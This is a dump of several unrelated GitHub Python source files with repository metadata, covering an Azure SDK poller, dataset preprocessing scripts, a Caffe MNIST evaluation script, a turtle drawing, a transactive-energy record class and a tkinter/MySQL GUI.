return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_rename_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
|
[
"noreply@github.com"
] |
fangchen0601.noreply@github.com
|
ecf5f0f62c51ab6359317746fd5f24df8967cb26
|
d268ee5da12d4eecc7bf97f37ec71ae58fe5854d
|
/data_set_prep/dataset_prep_scr.py
|
0cc7adb12c263a0b1b7b24868476e42d26b4213b
|
[] |
no_license
|
oiynick/rcnn_buildings
|
b5760727fc0063086362eaffe32e36e2fafc75e7
|
1be3d554e5e3a0bc13ed086c73f3a87f61e025d5
|
refs/heads/master
| 2020-04-28T08:57:19.537442
| 2019-03-21T12:54:29
| 2019-03-21T12:54:29
| 175,148,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,222
|
py
|
import numpy as np
import shapely
from aeronet import dataset as ds
def one_sample(fp_json, fp_tif):
# Read the JSON file and the TIF image
av_features = ds.vector.FeatureCollection.read(fp_json)
raster = ds.raster.Band(fp_tif)
# Image sizing info and setting up the coordinates
samples = raster.generate_samples(512, 512)
for i in samples:
# Taking bounds of the generated sample
bounds = i.bounds
# Create a shape of the polygon
area = shapely.geometry.polygon((bounds.min_point + bounds.max_point))
# Create a feature based on a shape
a_feature = ds.vector.Feature(area)
# Find the intersecting features
inter = av_features.intersection(a_feature)
# For every feature make a feature collection and raster data
for feature in inter:
offc = ds.vector.FeatureCollection(feature)
rasta = ds.transforms.rasterize(offc, i.transform, (512, 512))
yield rasta
def main():
amount = 1
res = np.empty(amount, [['complex']])
for i in range(amount):
fp_tif = '{}.tif'.format(i)
fp_json = '{}.json'.format(i)
res[i] = one_sample(fp_json, fp_tif)
|
[
"nikita.veliev@skoltech.ru"
] |
nikita.veliev@skoltech.ru
|
75d75f75c5dfebdcd52ba31013c836708232536a
|
6e68d7f4bbd2cf2ecad7cdf6bbd07d6687f2685c
|
/preprocessing.py
|
a406884f0db4f90c620feac07d8ce7282e1b221b
|
[] |
no_license
|
AbhinavJindl/sentiment_analysis
|
bd5a08345913d92cd5be0e61fe5095e196fb9d49
|
b2154a89f3c0bfa89318e8d280734ed25af1cc5f
|
refs/heads/master
| 2020-03-27T20:41:28.945916
| 2018-09-02T13:55:07
| 2018-09-02T13:55:07
| 147,086,857
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,108
|
py
|
import random
import pickle
no_words = 5000
no_reviews = 1000
no_validation=1000
no_test=1000
forest_trees=50
forest_tree_features=2000
def add_noice(review_list_pos,review_list_neg,p):
n=int((p/100)*len(review_list)/2)
random.sample(review_list,n)
def load(filename):
file = open(filename,'rb')
obj=pickle.load(file)
file.close()
return obj
def save(obj,filename):
file=open(filename,'wb')
pickle.dump(obj,file)
file.close()
#returns a dictionary for a review given string
def list_review(s,indexlist):
dic = {}
tokens=s.split(" ")
dic['sentiment']=int(tokens[0])
dic['list']=[]
for i in range(1,len(tokens)):
t=tokens[i].split(":")
if int(t[0]) in indexlist:
dic['list'].append(int(t[0]))
return dic
def preprocess():
wordsfile = open('aclImdb_v1/aclImdb/imdb.vocab','r',encoding='utf-8')
valuefile = open('aclImdb_v1/aclImdb/imdbEr.txt','r',encoding='utf-8')
count=0
words_i=[]
for line in valuefile:
linetoken=line.split('\n')
current=(count, float(linetoken[0]))
words_i.append(current)
count=count+1
words_i= sorted(words_i,key=lambda x: x[1])
indexlist=[]
for i in range(int(no_words/2)):
indexlist.append(words_i[i][0])
indexlist.append(words_i[-i][0])
indexlist= sorted(indexlist)
forest_index_lists=[]
for i in range(forest_trees):
forest_index_lists.append(random.sample(indexlist,forest_tree_features))
reviewsfile = open('aclImdb_v1/aclImdb/train/labeledBow.feat','r',encoding='utf-8')
full_review_list = reviewsfile.readlines();
random_list_pos = random.sample(range(0,int(len(full_review_list)/2)),int(no_reviews/2))
random_list_neg = random.sample(range(int(len(full_review_list)/2),len(full_review_list)),int(no_reviews/2))
review_list={}
for i in random_list_pos:
review_list[i]=list_review(full_review_list[i],indexlist)
for i in random_list_neg:
review_list[i]=list_review(full_review_list[i],indexlist)
testfile = open('aclImdb_v1/aclImdb/test/labeledBow.feat','r',encoding='utf-8')
test_review_list=testfile.readlines()
validation_list_pos=random.sample(range(0,int(len(full_review_list)/2)),int(no_validation/2))
validation_list_neg= random.sample(range(int(len(full_review_list)/2),len(full_review_list)),int(no_validation/2))
validation_list = validation_list_pos+validation_list_neg
validation_reviews={}
for i in validation_list:
validation_reviews[i]=list_review(full_review_list[i],indexlist)
test_list_pos=random.sample(range(0,int(len(test_review_list)/2)),int(no_test/2))
test_list_neg= random.sample(range(int(len(test_review_list)/2),len(test_review_list)),int(no_test/2))
test_list=test_list_neg+test_list_pos
test_reviews={}
for i in test_list:
test_reviews[i]=list_review(test_review_list[i],indexlist)
save(validation_reviews,'validationreviews.pkl')
save(validation_list,'validationlist.pkl')
save(test_reviews,'testreviews.pkl')
save(test_list,'testlist.pkl')
save(random_list_pos,'randompos.pkl')
save(random_list_neg,'randomneg.pkl')
save(review_list,'reviewlist.pkl')
save(indexlist,'indexlist.pkl')
if __name__=="__main__":
preprocess()
|
[
"2016csb1026@iitrpr.ac.in"
] |
2016csb1026@iitrpr.ac.in
|
f5dff936815d2f26b852c4ae10f5bf7d9e9004b8
|
ed569623f4686688edac40c2dabde0206546316b
|
/tests/unit/models/company_test.py
|
00eea0a1fdd38459098b429e193dbf491738925e
|
[] |
no_license
|
leobene/RadarMiles
|
34753114854f9dff7ee781060c2f99ec3a54d468
|
9810b04f29ba5a514dfcbfb0679f304f93842d37
|
refs/heads/master
| 2020-04-08T09:13:02.806563
| 2018-12-03T23:46:58
| 2018-12-03T23:46:58
| 159,213,641
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 711
|
py
|
from models.company import CompanyModel
from tests.base_test import BaseTest
class CompetitionTest(BaseTest):
def test_create_competition(self):
company = CompanyModel('GOL')
self.assertEqual(company.name, 'GOL',
"The name of the company after creation does not equal the constructor argument.")
def test_competition_json(self):
company = CompanyModel('GOL')
expected = {
'id': company.id,
'name': company.name,
}
self.assertEqual(
company.json(),
expected,
"The JSON export of the company is incorrect. Received {}, expected {}.".format(company.json(), expected))
|
[
"leobene@192.168.0.100"
] |
leobene@192.168.0.100
|
7a01f23b1d83f8f97510a946715871ec8f1d5700
|
6d63fb09abb41f2c3f6ba66091b8c0507044104d
|
/py/liu.py
|
3d41ef1913f6c48a13f1ebb8c86ac5ac6a627c48
|
[] |
no_license
|
buaaswf/backup-my-projects
|
dbc3d0c4ac5af38b4b8ce07be7978e3ff36cf75c
|
73577385da85fdd5899cb471220dd8334ca603bc
|
refs/heads/master
| 2021-04-15T03:44:06.248881
| 2018-03-22T08:58:36
| 2018-03-22T08:58:36
| 126,304,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,242
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import numpy as np
import sys
from sklearn.metrics import classification_report
sys.path.insert(0,"/home/s.li/2017/gpu4/caffe-segnet-cudnn5/python")
import matplotlib.pyplot as plt
import caffe
import os
import scipy.io
import shutil
from mnist_single_plot_roc import drawroc
# Make sure that caffe is on the python path:
from sklearn.metrics import confusion_matrix
from tsne.tsne_1 import tsnepng
def vis_square(resname, data, padsize=1, padval=0):
data -= data.min()
data /= data.max()
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imsave(resname, data)
def GetFileList(dir, fileList):
newDir = dir
if os.path.isfile(dir):
fileList.append(dir.decode('gbk'))
elif os.path.isdir(dir):
for s in os.listdir(dir):
#如果需要忽略某些文件夹,使用以下代码
if s.endswith(".txt") or s.endswith(".sh") or s.endswith(".py"):
continue
#if int(s)>998 and int(s) < 1000:
newDir=os.path.join(dir,s)
GetFileList(newDir, fileList)
return fileList
#dir = '/home/s.li/caffe0719/caffe-master/data/face/patch/casia1000/fullpathval.txt'
def labelfile(dir):
lines = []
with open (dir,'r') as f:
lines = [line.strip().split(' ') for line in f ]
#paths = [line[0] for line in lines]
#labels = [line[1] for line in lines]
# print lines
return lines
if len(sys.argv) != 4:
print "Usage: python multifc.py inputimagedir feature.mat labeldir"
# sys.exit()
def loadmodel(caffepath='../',modelpath='models/casiaface/casia.caffemodel',deployroot='models/casiaface/casia_train_deploy.prototxt',meanroot='data/idface/casia_web.npy',shapelist=[64,3,100,100]):
# caffe_root = caffepath # this file is expected to be in {caffe_root}/examples
caffe_root = "/home/s.li/2017/gpu4/caffe-segnet-cudnn5/"# this file is expected to be in {caffe_root}/examples
sys.path.insert(0, caffe_root + 'python')
plt.rcParams['figure.figsize'] = (10, 10)
plt.rcParams['image.interpolation'] = 'nearest'
params = {'legend.fontsize':20}
plt.rcParams.update(params)
# plt.rcParams['image.cmap'] = 'gray'
model =modelpath
if not os.path.isfile(model):
print("Downloading pre-trained CaffeNet model...")
caffe.set_mode_cpu()
net = caffe.Net(deployroot,model,caffe.TEST)
# input preprocessing: 'data' is the name of the input blob == net.inputs[0]
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2, 0, 1))
# transformer.set_mean('data', np.load(caffe_root + meanroot).mean(1).mean(1)) # mean pixel
blob = caffe.proto.caffe_pb2.BlobProto()
data = open( meanroot , 'rb' ).read()
blob.ParseFromString(data)
arr = np.array( caffe.io.blobproto_to_array(blob) )
out = arr[0]
transformer.set_mean('data', out.mean(1).mean(1)) # mean pixel
transformer.set_raw_scale('data', 255) # the reference model operates on images in [0,255] range instead of [0,1]
transformer.set_channel_swap('data', (2, 1, 0)) # the reference model has channels in BGR order instead of RGB
# set net to batch size of 50
net.blobs['data'].reshape(shapelist[0], shapelist[1], shapelist[2], shapelist[3])
return net,transformer
def image2mat(net,transformer,inputimagedir,outdir,labelfilepath,layername):
#inputimagedir = sys.argv[1]
mat = []
# lines = labelfile(labelfilepath)
# print lines
labels = []
pred = []
predroc= []
nn = 0
caffe.set_mode_gpu()
allimages= GetFileList(inputimagedir, [])
testimages =allimages
# from random import shuffle
import random
# print allimages
random.shuffle(testimages)
errorimagelist="./error/mnist_result/"+outdir.split(".")[0]
if not os.path.exists(errorimagelist):
os.makedirs(errorimagelist)
# print testimages
for image in testimages:
# print image,
gtlabel = int(image.split("/")[-2])
# print gtlabel
try:
net.blobs['data'].data[...] = transformer.preprocess('data', caffe.io.load_image(image))
except Exception, e:
print nn
print str(e)
nn += 1
continue
out = net.forward()
# pred.append(str(out['prob'].argmax()))
# print (out['prob'].shape)
# pred.append(out['prob'][1])
# print("image is {}Predicted class is #{}.".format(image,out['prob'].argmax()))
if out['prob'].argmax()!=gtlabel:
print out['prob'].argmax(),gtlabel
shutil.copy(image,errorimagelist+"/"+image.split("/")[-1].split(".")[0]+"_pred_"+str(out['prob'].argmax())+".png")
# caffe.set_mode_gpu()
# caffe.set_device(0)
#net.forward() # call once for allocation
# %timeit net.forward()
# feat = net.blobs[layername].data[1]
feat = net.blobs[net.blobs.keys()[-2]].data[0]
# for layer_name, param in net.params.iteritems():
# print layer_name + '\t' + str(param[0].data.shape), str(param[1].data.shape)
# print net.blobs.keys()
# filters = net.params['conv1'][0].data
# print filters
predroc.append(net.blobs[net.blobs.keys()[-1]].data[0].flatten())
pred.append(np.argmax(net.blobs[net.blobs.keys()[-1]].data[0].flatten()))
# print "===>>",net.blobs[net.blobs.keys()[-1]].data[0].flatten()
# pred.append(out['prob'])
# print out['prob']
# print net.blobs[net.blobs.keys()[-2]].data[0]
#np.savetxt(image+'feature.txt', feat.flat)
#print type(feat.flat)
featline = feat.flatten()
# print featline
#print type(featline)
#featlinet= zip(*(featline))
mat.append(featline)
label=image.split("/")[-2]
# labels.append(str(lines[nn][1]))
labels.append(int(label))
# print "===>>",out['prob'].argmax()
# print "=====>>",lines[nn][1]
if (nn%100==0):
with open("./error/mnist_result/"+outdir,'w') as f:
scipy.io.savemat(f, {'data' :mat,'labels':labels}) #append
nn += 1
# print pred.shape
# tsnepng(mat,labels,"gootsne_"+outdir)
print "tsnepng=========================>>>>"
drawroc(labels,predroc,"./error/mnist_result/"+"zoomroc_10"+outdir.split('.')[0]+".png")
print "roc=========================>>>>"
print (classification_report(labels,pred))
text_file = open("./error/mnist_result/"+outdir.split('.')[0]+".txt", "w")
text_file.write(outdir.split('.')[0]+" model\n")
text_file.write(classification_report(labels,pred))
import pickle
with open("./error/mnist_result/"+outdir.split('.')[0]+"_pred.pkl","wb") as f:
pickle.dump(mat,f)
with open("./error/mnist_result/"+outdir.split('.')[0]+"_true.pkl","wb") as f:
pickle.dump(labels,f)
with open("./error/mnist_result/"+outdir,'w') as f:
scipy.io.savemat(f, {'data' :mat,'labels':labels}) #append
cm=confusion_matrix(pred, labels)
with open("./error/mnist_result/"+outdir.split(".")[0]+".pkl","wb") as f:
pickle.dump(cm,f)
print cm
np.savetxt("./error/mnist_result/"+outdir.split(".")[0]+"mfse"+".csv", cm, delimiter=",")
def batch_extrac_featuretomat():
#alexnet
# alexnetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_alex/"
# alexnetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_alex/"
alexnetpath="/home/s.li/2016/caffe1128/caffe-master/models/"
# googlenetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_googlenet/"
# cifar10netpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar_cifar10/"
# svhn_cifar10netpath="/home/swf/caffe/analysisfeatures/oversample/svhn/cifar10net/"
# svhn_googlenetpath="/home/swf/caffe/analysisfeatures/oversample/svhn/googlenet/"
# svhn_alexnetpath="/home/swf/caffe/analysisfeatures/oversample/svhn/alexnet/"
# googlenetpath+"bvlc_googlenet_iter_520000.caffemodel",\
# googlenetpath+"oribvlc_googlenet_iter_520000.caffemodel",\
# modelist=[alexnetpath+"oriciafr10caffe_alexnet_train_iter_390000.caffemodel",\
# alexnetpath+"dvnciafr10caffe_alexnet_train_iter_450000.caffemodel",\
# modelist=[alexnetpath + "cifar10gen_caffe_alexnet_train_iter_130000.caffemodel",\
# modelist =[alexnetpath + "cifar10balanced0_caffe_alexnet_train_iter_410000.caffemodel",\
# modelist =[alexnetpath + "7caffe_alexnet_train_iter_30000.caffemodel",\
# modelist =[alexnetpath + "0509dvn/caffe_alexnet_train_iter_120000.caffemodel",\
# modelist =[alexnetpath + "10caffe_alexnet_train_iter_10000.caffemodel",\
modelist =[alexnetpath + "mnist/mnist_data/result1/caffe_alexnet_train_iter_140000.caffemodel",\
alexnetpath + "mnist/mnist_data/result2/caffe_alexnet_train_iter_120000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result3/caffe_alexnet_train_iter_120000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result4/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result5/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result6/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result7/caffe_alexnet_train_iter_50000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result8/caffe_alexnet_train_iter_60000.caffemodel",\
alexnetpath + "mnist/mnist_data/result9/caffe_alexnet_train_iter_110000.caffemodel",\
alexnetpath + "mnist/mnist_data/result10/caffe_alexnet_train_iter_50000.caffemodel",\
alexnetpath + "mnist/mnist_data/result11/caffe_alexnet_train_iter_50000.caffemodel",\
]
datalist=["/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
]
deploylist=[alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
]
# meanlist=[alexnetpath+"patchcifa10_256_mean.binaryproto",
meanlist=[alexnetpath+"mnist/mnist_data/mean/mean1.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean2.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean3.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean4.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean5.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean6.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean7.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean8.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean9.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean10.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean11.binaryproto",
]
shapelists=[[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227]]#
# [32,3,224,224],[32,3,224,224],\
# [64,3,32,32],[64,3,32,32],[64,3,32,32],[64,3,32,32],
# [10,3,227,227],[10,3,227,227],[10,3,224,224],[10,3,224,224]]
labellist=["cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",]
#"cifa10_valdst.csv",]
# "svhn_ori_valdst.csv",]
# labellist=[""]
# outlist=["cifar10_alex_oversmaple.mat","cifar10_alex_ori.mat","cifar10_cifar10_dvn.mat",
# "cifar10_cifar10_ori.mat","cifar10_google_dvn.mat","cifar10_google_ori.mat",
# "svhn_cifar10_dvn.mat","svhn_cifar10_ori.mat","svhn_alex_dvn.mat","svhn_alex_ori.mat",
# "svhn_google_dvn.mat","svhn_google_ori.mat"
# ]
outlist=["alex_mfseoverh1.mat","alex_mfseoverh2.mat",
"alex_mfseoverh5.mat","alex_mfseoverh6.mat",
"alex_mfseoverh7.mat","alex_mfseoverh9.mat",
"alex_mfseoverh10.mat","alex_mfseoverh11.mat",]
#]
layernamelist=["fc8","fc8","fc8","fc8","fc8","fc8","fc8","fc8"]
# "ip1","ip1","fc8","fc8","loss3/classifier","loss3/classifier"]
# layernamelist=["fc8","fc8","loss3/classifier","loss3/classifier","ip1","ip1",
# "ip1","ip1","fc8","fc8","loss3/classifier","loss3/classifier"]
import traceback
# for i in range(len(modelist)-1,len(modelist)):
for i in range(0,len(modelist)):
# for i in range(0,1):
# if i<4 and i>1:
# continue
# for i in range(2,4):
try:
print modelist[i]
net,transformer=loadmodel(modelpath=modelist[i],deployroot=deploylist[i],
meanroot=meanlist[i],shapelist=shapelists[i])
image2mat(net,transformer,datalist[i],outlist[i],labellist[i],layernamelist[i])
except Exception as e:
print e
print traceback.format_exc()
# break
continue
#argv[0] inputimagedir argv[1] labelfile
if __name__=='__main__':
# if len(sys.argv)!=3:
# print "Usage:python{}inputimagedir outdir labelfile".format(sys.argv[0])
batch_extrac_featuretomat()
#net,transformer=loadmodel(sys.argv[0],sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
# net,transformer=loadmodel(modelpath='models/cifa10/cifar10_19layers_iter_200000.caffemodel',deployroot="models/cifa10/cifar10_deploy.prototxt",meanroot="data/cifar10-gcn-leveldb-splits/paddedmean.npy",shapelist=[100,3,32,32])
# # net,transformer=loadmodel(modelpath='models/cifa10/cifar10_19layers_iter_200000.caffemodel',deployroot="models/scene/deploy.prototxt",shapelist=[50,3,100,100])
# image2mat(net,transformer,sys.argv[1],sys.argv[2],sys.argv[3])#argv[0] inputimagedir argv[1] labelfile
#def loadmodel(cafferoot,modelpath,deployroot,meanroot,shapelist=[64,3,100,100]):
|
[
"noreply@github.com"
] |
buaaswf.noreply@github.com
|
e27d03897ae226bf6eafffa5093cee07b628880d
|
a1dd6f2e13506b54120532c2ed093dc270eff4ac
|
/GridServices/TransactiveControl/TNT_Version1/TNSAgent/tns/transactive_record.py
|
3f466148e9947fe21eff8fd0e8fe6acc846f3d6b
|
[
"BSD-3-Clause"
] |
permissive
|
shwethanidd/volttron-pnnl-applications-2
|
ec8cc01c1ffeff884c091617892fea6e84a3e46e
|
24d50729aef8d91036cc13b0f5c03be76f3237ed
|
refs/heads/main
| 2023-06-18T12:13:13.607951
| 2021-06-30T23:00:01
| 2021-06-30T23:00:01
| 359,586,385
| 0
| 0
|
BSD-3-Clause
| 2021-04-19T20:15:45
| 2021-04-19T20:15:45
| null |
UTF-8
|
Python
| false
| false
| 4,505
|
py
|
"""
Copyright (c) 2020, Battelle Memorial Institute
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those
of the authors and should not be interpreted as representing official policies,
either expressed or implied, of the FreeBSD Project.
This material was prepared as an account of work sponsored by an agency of the
United States Government. Neither the United States Government nor the United
States Department of Energy, nor Battelle, nor any of their employees, nor any
jurisdiction or organization that has cooperated in th.e development of these
materials, makes any warranty, express or implied, or assumes any legal
liability or responsibility for the accuracy, completeness, or usefulness or
any information, apparatus, product, software, or process disclosed, or
represents that its use would not infringe privately owned rights.
Reference herein to any specific commercial product, process, or service by
trade name, trademark, manufacturer, or otherwise does not necessarily
constitute or imply its endorsement, recommendation, or favoring by the
United States Government or any agency thereof, or Battelle Memorial Institute.
The views and opinions of authors expressed herein do not necessarily state or
reflect those of the United States Government or any agency thereof.
PACIFIC NORTHWEST NATIONAL LABORATORY
operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
under Contract DE-AC05-76RL01830
"""
from datetime import datetime
from .time_interval import TimeInterval
from .helpers import format_ts
class TransactiveRecord:
def __init__(self, ti, rn, mp, p, pu=0.0, cost=0.0, rp=0.0, rpu=0.0, v=0.0, vu=0.0):
# NOTE: As of Feb 2018, ti is forced to be text, the time interval name,
# not a TimeInterval object.
# ti - TimeInterval object (that must be converted to its name)
# rn - record number, a nonzero integer
# mp - marginal price [$/kWh]
# p - power [avg.kW]
# These are the four normal arguments of the constructor.
# NOTE: Use the time interval ti text name, not a TimeInterval object itself.
if isinstance(ti, TimeInterval):
# A TimeInterval object argument must be represented by its text name.
self.timeInterval = ti.name
else:
# Argument ti is most likely received as a text string name. Further
# validation might be used to make sure that ti is a valid name of an
# active time interval.
self.timeInterval = ti
self.record = rn # a record number (0 refers to the balance point)
self.marginalPrice = mp # marginal price [$/kWh]
self.power = p # power [avg.kW]
# Source and target are obvious from Neighbor and filenames. Omit
# self.powerUncertainty = pu # relative [dimensionless]
self.cost = cost # ?
# self.reactivePower = rp # [avg.kVAR]
# self.reactivePowerUncertainty = rpu # relative [dimensionless]
# self.voltage = v # [p.u.]
# self.voltageUncertainty = vu # relative [dimensionless]
# Finally, create the timestamp that captures when the record is created.
self.timeStamp = datetime.utcnow()
|
[
"shwetha.niddodi@pnnl.gov"
] |
shwetha.niddodi@pnnl.gov
|
4d1858de9f200007868855912c5cb09bbd0ff480
|
b99255c89683d4123a560a1eb6221b21013d917d
|
/path_manager/page/category_page.py
|
f51ce67d375f686b79ed3751f06300e58f94fc61
|
[
"MIT"
] |
permissive
|
sweetcolor/internet_market_scraper
|
f7a89e8c54124aadfecaa89f1c84d6c73762ff8b
|
f7eb8c9ade2c0a956ba5d5b7e6173010c85afed6
|
refs/heads/master
| 2021-09-04T04:05:46.529150
| 2018-01-15T17:02:59
| 2018-01-15T17:02:59
| 115,523,578
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 156
|
py
|
from path_manager.page.page import Page
class CategoryPage(Page):
def __init__(self, link, parent_page):
super().__init__(link, parent_page)
|
[
"sweet3color@gmail.com"
] |
sweet3color@gmail.com
|
8dffd82bcaecce6cabc8c75ad494f05fdb50eb2c
|
463b1807820b9fa119e0c17afaa06840fef0e2a3
|
/TURTLE/Rainbow.py
|
c1cd2fce89f6b3134ecc681a44f9b1183f16a2cc
|
[] |
no_license
|
ferdi-oktavian/Python
|
ad8aac711d5565739077a6e5358777807dd464d3
|
27ad83aeedb3e460927bfcf179bc4e4b1ed28366
|
refs/heads/main
| 2023-03-09T02:49:54.481087
| 2021-03-02T00:12:54
| 2021-03-02T00:12:54
| 343,593,542
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
import turtle
import colorsys
def draw_one_color_arc(x, y, r, pensize, color):
turtle.up();turtle.goto(x+r,y)
turtle.down();turtle.seth(90)
turtle.pensize(pensize);turtle.pencolor(color)
turtle.circle(r,180)
turtle.speed(0)
turtle.hideturtle()
turtle.bgcolor('light blue')
turtle.title('rainboww')
turtle.setup(700, 700)
num_colors = 49
radius = 400
penwidth = 20 * 7 / num_colors
hue = 0
for i in range(num_colors):
(r, g, b) = colorsys.hsv_to_rgb(hue,1,1)
draw_one_color_arc(0, -100,radius,penwidth,(r,g,b))
radius -= (penwidth-1)
hue += 0.9/num_colors
turtle.getscreen()._root.mainloop()
|
[
"noreply@github.com"
] |
ferdi-oktavian.noreply@github.com
|
d9f0bd32c021cff6d85d2b4c86f7c6a119a3be14
|
0912be54934d2ac5022c85151479a1460afcd570
|
/Ch07_Code/GUI_MySQL.py
|
cf54d12400d1045cffa7dcdeaa05f864343ff849
|
[
"MIT"
] |
permissive
|
actuarial-tools/Python-GUI-Programming-Cookbook-Third-Edition
|
6d9d155663dda4450d0b180f43bab46c24d18d09
|
8c9fc4b3bff8eeeda7f18381faf33c19e98a14fe
|
refs/heads/master
| 2023-01-31T13:11:34.315477
| 2020-12-15T08:21:06
| 2020-12-15T08:21:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,876
|
py
|
'''
Created on May 29, 2019
@author: Burkhard
'''
#======================
# imports
#======================
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import Menu
from tkinter import Spinbox
from Ch07_Code.ToolTip import ToolTip
from threading import Thread
from time import sleep
from queue import Queue
from tkinter import filedialog as fd
from os import path, makedirs
from tkinter import messagebox as mBox
from Ch07_Code.GUI_MySQL_class import MySQL
# Module level GLOBALS
GLOBAL_CONST = 42
fDir = path.dirname(__file__)
netDir = fDir + '\\Backup'
if not path.exists(netDir):
makedirs(netDir, exist_ok = True)
WIDGET_LABEL = ' Widgets Frame '
#===================================================================
class OOP():
def __init__(self):
# Create instance
self.win = tk.Tk()
# Add a title
self.win.title("Python GUI")
# Disable resizing the window
self.win.resizable(0,0)
# Create a Queue
self.guiQueue = Queue()
self.createWidgets()
# populate Tab 2 Entries
self.defaultFileEntries()
# create MySQL instance
self.mySQL = MySQL()
def defaultFileEntries(self):
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, 'Z:\\') # bogus path
